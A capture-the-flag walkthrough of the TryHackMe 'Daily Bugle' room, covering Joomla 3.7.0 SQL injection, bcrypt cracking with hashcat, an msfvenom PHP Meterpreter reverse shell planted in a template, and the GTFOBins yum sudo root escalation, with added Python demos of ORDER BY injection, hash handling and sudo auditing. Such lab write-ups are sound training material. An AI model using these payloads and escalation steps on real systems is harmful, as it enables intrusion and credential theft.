TryHackMe Daily Bugle Made Easy – A Helpful Walkthrough with Hacking Video


CHALLENGE OVERVIEW

  • Link: https://tryhackme.com/room/dailybugle
  • Difficulty: hard
  • Target: user/root flags
  • Highlight: leveraging sudo privileges on yum to gain a root shell
  • Tools used: nmap, dirb, sqlmap, hashcat, gtfobins
  • Tags: joomla, sqli, yum

BACKGROUND

This box is another black-box-style challenge with a few extra guiding questions.

We learn that the “Daily Bugle” reports front-page news about Spiderman robbing a bank. It’s our job to hack into the system to recover the user + root flags.

The tags joomla, sqli, and yum also point us in the direction of the joomla service, SQL injection, and leveraging user permissions on the yum binary to gain root access.

ENUMERATION/RECON

NMAP

sudo nmap -A -O -oN nmap-results.txt <$targetIP>

(-A already turns on OS detection, version detection, default scripts and traceroute, so -O is redundant here but harmless.) We'll follow that up with an nmap vuln-category script scan for more information about potential vulnerabilities; -O needs root, so keep the sudo:

sudo nmap --script vuln -O -oN nmap-vuln.txt <$targetIP>

Here is a snippet of interesting nmap results:

DIRB

dirb http://<$targetIP>

A snippet of interesting dirb scan results:

Notable findings include the /administrator directory, which is Joomla's backend login portal. We'll keep this in mind for later on in the hack.

SQLMAP

Cross-referencing the vulnerability discovered by our nmap vuln script scan in exploit-db, we find a downloadable text exploit file with instructions to use sqlmap.

I attempted to execute this exploit via Metasploit console but had no luck.

Plan B is to use sqlmap with the command given in the text file from exploit-db.

Our first attempt at using sqlmap errors out, so we lower the --risk level and try again.

Our new command with --risk=2 completes the job, but doesn't turn up anything interesting.

Let’s search around for a different method to exploit this vulnerability.

INITIAL FOOTHOLD

We searched for Joomla 3.7.0 exploit and found a Python script. Let’s go ahead and use the following command to start the exploit:

python3 sqli.py http://<$targetIP>/index.php?component/users/?view=login?

Success! We extracted a username and a hashed password. 

Output:

Extracting users from fb9j5_users
 [$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
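To see why an unvalidated sort parameter is a SQL injection sink, here is an added illustration (my own example, not the sqli.py script used above and not Joomla's code): a tiny sqlite stand-in for the users table, the vulnerable ORDER BY concatenation beside a whitelist fix, and a boolean oracle that reads jonah's stored hash one character at a time through the sort order. The Joomla 3.7.0 bug the script exploits (CVE-2017-8917) is the same class, an unvalidated list-ordering parameter, though the public exploit uses MySQL error-based extraction rather than this sort-order oracle. The table prefix and column order follow the exploit output above; the rows and hash values are constructed placeholders.

```python
import sqlite3

# Constructed sample rows: the table prefix and column order mirror the exploit
# output above; the password values are placeholders, not real bcrypt hashes.
SAMPLE_USERS = [
    (811, "Super User", "jonah", "jonah@tryhackme.com",
     "$2y$10$placeholderhashplaceholderhashplaceholderhash"),
    (812, "Site Editor", "editor", "editor@tryhackme.com",
     "$2y$10$anotherplaceholderanotherplaceholderanother"),
]


def make_db():
    """In-memory stand-in for the Joomla database (sqlite here, MySQL on the box)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE fb9j5_users "
                 "(id INTEGER, name TEXT, username TEXT, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO fb9j5_users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def list_users_vulnerable(conn, fullordering):
    """VULNERABLE: the request's sort expression is concatenated into ORDER BY.
    Bind parameters cannot help here: ORDER BY takes an expression, not a value."""
    return conn.execute("SELECT id, name FROM fb9j5_users ORDER BY " + fullordering).fetchall()


ALLOWED_ORDERING = {"id ASC", "id DESC", "name ASC", "name DESC"}


def list_users_hardened(conn, fullordering):
    """HARDENED: only a fixed whitelist of column/direction pairs reaches the query."""
    if fullordering not in ALLOWED_ORDERING:
        raise ValueError("rejected ordering value: %r" % fullordering)
    return conn.execute("SELECT id, name FROM fb9j5_users ORDER BY " + fullordering).fetchall()


def is_rejected(conn, fullordering):
    """True when the hardened version refuses the supplied ordering."""
    try:
        list_users_hardened(conn, fullordering)
    except ValueError:
        return True
    return False


def leak_char(conn, position, guess):
    """Boolean oracle through the vulnerable sort: rows come back ascending by id
    when the guessed character of jonah's hash is right, descending otherwise."""
    expr = ("(CASE WHEN (SELECT substr(password, %d, 1) FROM fb9j5_users "
            "WHERE username = 'jonah') = '%s' THEN id ELSE -id END)") % (position, guess)
    rows = list_users_vulnerable(conn, expr)
    return rows[0][0] == 811


def extract_hash_prefix(conn, length):
    """Recover the first `length` characters of the stored hash, one position at a time."""
    alphabet = "$./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if leak_char(conn, pos, ch):
                recovered += ch
                break
        else:
            break  # character outside the alphabet: stop rather than guess
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked through ORDER BY:", extract_hash_prefix(db, 7))
    print("hardened rejects payload:", is_rejected(db, "(CASE WHEN 1=1 THEN id ELSE -id END)"))
```

Each oracle query leaks one bit, so a full 60-character bcrypt string costs a few thousand requests; error-based extraction, which the real exploit uses, gets whole rows per request, but the root cause and the fix (a whitelist, since ORDER BY cannot be parameterised) are the same.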

CRACK THAT HASH WITH HASHCAT

Let’s fire up hashcat and start the cracking!

A quick google search for a hash identifier website helps us determine that the hashing method used is bcrypt (the $2y$ prefix is bcrypt's Modular Crypt Format identifier, and the 10 that follows is the cost factor: 2^10 rounds of key setup per guess, which is why cracking it is slow). I looked up the id number for this hash in the help for hashcat (hashcat --help) and found it was -m 3200.

I omitted this step from the video to save time and keep people watching.

Hashcat took 51 mins, 18 secs to crack the hash using rockyou.txt for the wordlist. I also attempted to use John the Ripper to crack this hash, which was much slower than hashcat on my machine.

After saving the hash string in a file named hash, we can let hashcat do the work. The cracking run itself takes the hash file and the wordlist:

hashcat -m 3200 hash /path/to/rockyou.txt

Once it has finished (or if we come back later), --show prints the cracked pair from hashcat's potfile without cracking anything again:

hashcat -m 3200 --show hash

Results:

Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p...BtZutm
Time.Started.....: Mon Jan 30 12:15:23 2023 (51 mins, 18 secs)
Time.Estimated...: Mon Jan 30 13:06:41 2023 (0 secs)
Guess.Base.......: File (/home/kalisurfer/hacking-tools/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       15 H/s (17.05ms) @ Accel:8 Loops:8 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests
Progress.........: 46848/14344384 (0.33%)
Rejected.........: 0/46848 (0.00%)
Restore.Point....: 46816/14344384 (0.33%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidates.#1....: sword -> smile4ever

Started: Mon Jan 30 12:15:18 2023
Stopped: Mon Jan 30 13:06:42 2023

Hashcat records cracked hashes in its potfile, which is what --show reads back (add -o to also write results to a file of your choice). Now that we have our username and password we can go ahead and log in to that administrator portal we discovered earlier.

jonah:sp—--omitted—--23
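An added worked example for this section (my own code, not from the write-up or from hashcat): parse the bcrypt string into its variant, cost, salt and digest, map Modular Crypt Format prefixes to hashcat modes, bound the dictionary run time from the observed rate, and reproduce what hashcat --show does by joining the hash file against the potfile. The hash is the one extracted above; the potfile entry is constructed, since the real plaintext is redacted.

```python
import re

PAGE_HASH = "$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm"

# Modular Crypt Format identifiers and the hashcat modes that crack them
# (mode numbers as printed by `hashcat --help`).
MCF_MODES = {"2a": 3200, "2b": 3200, "2y": 3200, "1": 500, "5": 7400, "6": 1800}

# bcrypt layout: $2<variant>$<cost>$<22-char salt><31-char digest>, alphabet ./A-Za-z0-9
BCRYPT_RE = re.compile(r"^\$(2[aby])\$(\d\d)\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")


def parse_bcrypt(h):
    """Split a bcrypt string into its fields and sanity-check the cost factor."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a well-formed bcrypt string: %r" % h)
    variant, cost, salt, digest = m.groups()
    cost = int(cost)
    if not 4 <= cost <= 31:
        raise ValueError("bcrypt cost out of range: %d" % cost)
    return {"variant": variant, "cost": cost, "iterations": 2 ** cost,
            "salt": salt, "digest": digest}


def hashcat_mode(h):
    """Pick the -m value from the MCF identifier between the first two '$'."""
    ident = h.split("$")[1] if h.startswith("$") and h.count("$") >= 2 else ""
    if ident not in MCF_MODES:
        raise ValueError("unrecognised or non-MCF hash: %r" % h)
    return MCF_MODES[ident]


def crack_command(h, hash_file, wordlist):
    """The command that does the cracking; `--show` on its own only reads the potfile."""
    return ["hashcat", "-m", str(hashcat_mode(h)), hash_file, wordlist]


def worst_case_hours(candidates, hashes_per_second):
    """Upper bound on a straight dictionary run at the observed rate."""
    return candidates / hashes_per_second / 3600.0


def show_cracked(hash_lines, potfile_lines):
    """What `hashcat --show <hashfile>` does: join the hash file against the potfile
    (lines of hash:plaintext) and return only hashes with a known plaintext."""
    cracked = {}
    for line in potfile_lines:
        line = line.rstrip("\n")
        if ":" not in line:
            continue
        h, _, plain = line.partition(":")  # bcrypt strings never contain ':'; plaintext may
        cracked[h] = plain
    out = []
    for line in hash_lines:
        h = line.strip()
        if h in cracked:
            out.append("%s:%s" % (h, cracked[h]))
    return out


# Constructed potfile entry: the real plaintext is redacted in the write-up above.
SAMPLE_POTFILE = [PAGE_HASH + ":example-password\n"]

if __name__ == "__main__":
    info = parse_bcrypt(PAGE_HASH)
    print("variant %s cost %d (%d iterations)" % (info["variant"], info["cost"], info["iterations"]))
    print(" ".join(crack_command(PAGE_HASH, "hash", "rockyou.txt")))
    # rockyou.txt has 14,344,384 lines; the run above reported 15 H/s
    print("worst case %.0f hours at 15 H/s" % worst_case_hours(14344384, 15))
    print(show_cracked([PAGE_HASH + "\n"], SAMPLE_POTFILE))
```

The worst-case figure makes the 51-minute result look lucky rather than typical: at 15 H/s the whole of rockyou would take about eleven days, and the candidate counter in the output above shows the hit came within the first 0.33% of the list.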

Now that we are in Joomla's administrator backend, we can edit the site's template files to add a reverse shell. In the template editor we'll open the template's error.php, replace its contents with a reverse Meterpreter payload, save it, and trigger it afterwards by requesting that file from the web server.

CREATE A METERPRETER PAYLOAD

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.6.2.23 LPORT=2222 -f raw > rev.php

UPLOAD THE FILE IN TEMPLATES/ERROR.PHP

We'll use the common text editor VIM to copy everything in rev.php to our clipboard, ready to paste into the template editor, using the quick and easy command:

:%y+
  • % – apply the command to every line
  • y – yank (copy)
  • + – into the + register, which is the system clipboard

And then :q! to quit without saving. This only works in a vim built with clipboard support: check vim --version | grep clipboard and look for +clipboard; if it says -clipboard, xclip -selection clipboard < rev.php does the same job from the shell.

CATCH A REVERSE METERPRETER SHELL

We'll set up the listener using Metasploit's exploit/multi/handler, being careful to set the payload to the same one we gave msfvenom (set payload php/meterpreter_reverse_tcp) and the same LHOST (10.6.2.23) and LPORT (2222), then run it and request the edited error.php to fire the shell.

After catching the meterpreter shell, we'll upload linpeas with meterpreter's upload command, drop to a regular shell with the shell command, and run it from there. Among its findings is a plaintext password, which turns out to be the password for jjameson.

LOGIN AS jjameson VIA SSH

Now that we presumably have a password login combo with jjameson, let’s try connecting via ssh. It works, and we are in as jjameson. Let’s grab the user flag and then continue on to privesc.

EXPLOIT

cat user.txt
27—---omitted—------2e

PRIVILEGE ESCALATION

Let's check sudo permissions with sudo -l. It shows that jjameson can run yum as root.

Checking GTFOBins for yum, we find a pathway toward root privileges: yum accepts its own config file (-c), the config can point the plugin directory at a location we control, and a plugin is just Python that yum executes as root. All we have to do is paste the following lines from GTFOBins (the first two heredocs create the config and plugin-enable files that the final command relies on):

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconf_path=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y
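An added check for this step (my own example, not from the write-up or GTFOBins): parse sudo -l output into run-as/tag/command entries and flag commands whose binary can hand over a shell, with yum's plugin loading as the reason it is flagged. The sudo output below is constructed in the shape sudo prints on a RHEL-family host; only the yum entry reflects this box, the other two are made up for contrast, and the SHELL_CAPABLE table is a small excerpt of what GTFOBins catalogues, not a complete list.

```python
import re
from os.path import basename

# Constructed sample of `sudo -l` output. The yum line matches the box; the
# other two entries are invented to show argument-restricted and multi-command lines.
SAMPLE_SUDO_L = """\
Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, env_reset,
    secure_path=/sbin:/bin:/usr/sbin:/usr/bin

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
    (root) /usr/bin/less /var/log/messages
    (ALL : ALL) /usr/bin/systemctl restart httpd, /usr/bin/systemctl status httpd
"""

# Binaries that hand out a root shell by design when run under sudo: a small
# excerpt of what GTFOBins documents, with the feature that makes each risky.
SHELL_CAPABLE = {
    "yum": "loads Python plugins from a config file chosen with -c",
    "less": "spawns a shell with !sh from its pager prompt, whatever file it was given",
    "vim": "runs shell commands with :!sh",
    "find": "runs -exec /bin/sh",
    "python": "executes arbitrary code",
}

# (runas[:group]) [TAG: ...] command[, command...]
ENTRY_RE = re.compile(
    r"^\s*\(([^)]*)\)\s*((?:(?:NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):\s*)*)(.+)$")


def parse_sudo_l(text):
    """Turn the 'may run the following commands' block into one dict per command."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.groups()
        user, _, group = runas.partition(":")
        for cmd in cmds.split(","):
            entries.append({
                "runas_user": user.strip(),
                "runas_group": group.strip() or None,
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd.strip(),
            })
    return entries


def audit(entries):
    """Return (entry, reason) for every command that can be turned into a shell."""
    findings = []
    for e in entries:
        if e["command"] == "ALL":
            findings.append((e, "unrestricted"))
            continue
        prog = basename(e["command"].split()[0])
        if prog in SHELL_CAPABLE:
            findings.append((e, SHELL_CAPABLE[prog]))
    return findings


if __name__ == "__main__":
    for entry, reason in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        flag = "NOPASSWD " if entry["nopasswd"] else ""
        print("%s%s as %s: %s" % (flag, entry["command"], entry["runas_user"], reason))
```

The less entry is flagged even though sudoers pins its argument: restricting arguments does nothing for a binary that can spawn a shell from inside, which is the same reason a plain /usr/bin/yum entry is enough for the GTFOBins trick above.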

POST-EXPLOITATION

Now we can recover the root flag in the usual spot: /root/root.txt

ee—---------omitted—----------79

FINAL THOUGHTS

Although this box has a difficulty rating of hard, I didn’t find it to be much more complex than some of the easy-rated boxes on TryHackMe. It did take a few extra hours to complete, so maybe length is a factor that they consider when determining difficulty ratings. 

PERSONAL HACKING GOALS

My immediate goal is to get into the top 1% of hackers ranked on the platform. I’m currently in the top 2% and still need to surpass roughly 10,000 hackers before I can join the ranks in the top 1%.

Jumping from a new hacker to the top 3% seemed to happen very quickly. The jump to the top 2% took considerable effort, and the next jump seems exponentially more difficult.